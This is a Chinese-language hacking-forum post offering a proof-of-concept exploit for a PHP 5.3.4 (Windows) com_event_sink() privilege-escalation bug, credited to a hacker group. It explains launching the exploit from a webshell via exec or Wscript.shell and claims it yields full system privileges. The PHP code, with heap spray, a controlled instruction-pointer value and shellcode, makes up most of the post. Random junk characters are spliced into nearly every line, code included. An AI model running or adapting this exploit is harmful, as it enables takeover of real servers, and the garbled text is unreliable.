|
|
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
4 a, F" M' F6 J1 b8 m6 o6 E& v, f- s7 i) ]4 M, [3 o8 R9 {
测试方法如下:cmd /c x:\php\php.exe x:\test.php
4 m" F3 L2 T- l
4 C" k. ~+ G* L4 L% p0 V. Z" Z下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php4 t2 e( a l$ j) N
这里是两个测试的截图:/ M p( @# ^; Z% n
9 b9 R9 p5 M* ~6 {/ ? l' o: L# G- ^7 d# P5 b c! c
- O# {% u- ?9 w2 _1 e* n! v# E( T' G3 ~6 R+ l# y% t4 h* E4 K9 o
. N; Y, L5 b9 m5 _1 A% `
成功利用此漏洞的攻击者将获得系统的最高权限6 B; d/ n' o3 {5 Y6 g) p& }
7 I: | z. R* d1 X" A3 `5 i0 D
( X0 I- v9 j/ A4 _9 e+ O: _& j/ Z, ?3 Z1 G
, Y6 u" E2 G3 u* E8 |% s( x
$ f6 @/ L" Z" w: I关于漏洞分析稍后附上。一下是PoC代码:6 H2 W7 [6 P* o2 E
9 ?) X& `: G5 K
<?php3 t* T1 D. D3 k
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞8 h9 J' U7 G- g. U0 {: R
//$eip ="\x44\x43\x42\x41";! N4 ?2 E: W5 w+ |% J( k1 G
$eip= "\x4b\xe8\x57\x78";$ n: Q& v2 @3 W: x9 \
$eax ="\x80\x01\x8d\x04";
4 }# R# o0 f/ ~$deodrant="";
6 H1 O8 j3 F- M- v4 }' e1 g$axespray = str_repeat($eip.$eax,0x80);
4 D* {7 F- V! B$ o, g6 C2 q; a' W- }5 l//048d0190
& q! T$ ^5 [& Gecho strlen($axespray);7 f$ F4 b, W/ ?/ X9 I5 o' c( ^& y" i
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";! k0 d9 e, @. L
echo "Silic Group Hacker Army - BlackBap.Org";/ B, J/ p) P: J9 \/ T( P! }% \
//19200 ==4B32 4b00) v, s/ ]* J$ ?2 D5 u6 U' p+ ~
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}! q2 u* g# ]( L' L$ U R3 T) t' \
$terminate = "T";( V! D" w7 g; S% o
$u[] =$deodrant;/ Z. L# D; n8 W, J1 a1 A& e) g
$r[] =$deodrant.$terminate;/ _+ W* w) ]) [0 O- D9 `
$a[] =$deodrant.$terminate;* _; f% x1 B3 {/ C, ?9 k
$s[] =$deodrant.$terminate;
9 C* O( y9 v4 Y" o# C3 }//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的
0 Y0 g. V) y0 C! e0 D+ A$vVar = new VARIANT(0x048d0000+180);
! g; i% `( e" H0 H+ F! G//弹窗代码(Shellcode)
- s7 \& l" w) }; h) r* ]$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";$ c t) ^* l; U. t, |8 h( U/ X
$var2 = new VARIANT(0x41414242);
6 s* l# R: n9 y) k: t/ e# `( gcom_event_sink($vVar,$var2,$buffer);
; i5 o7 ?- C! n M) b+ B?>- q0 W; F9 C# G5 c5 M" Q+ Q+ x
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|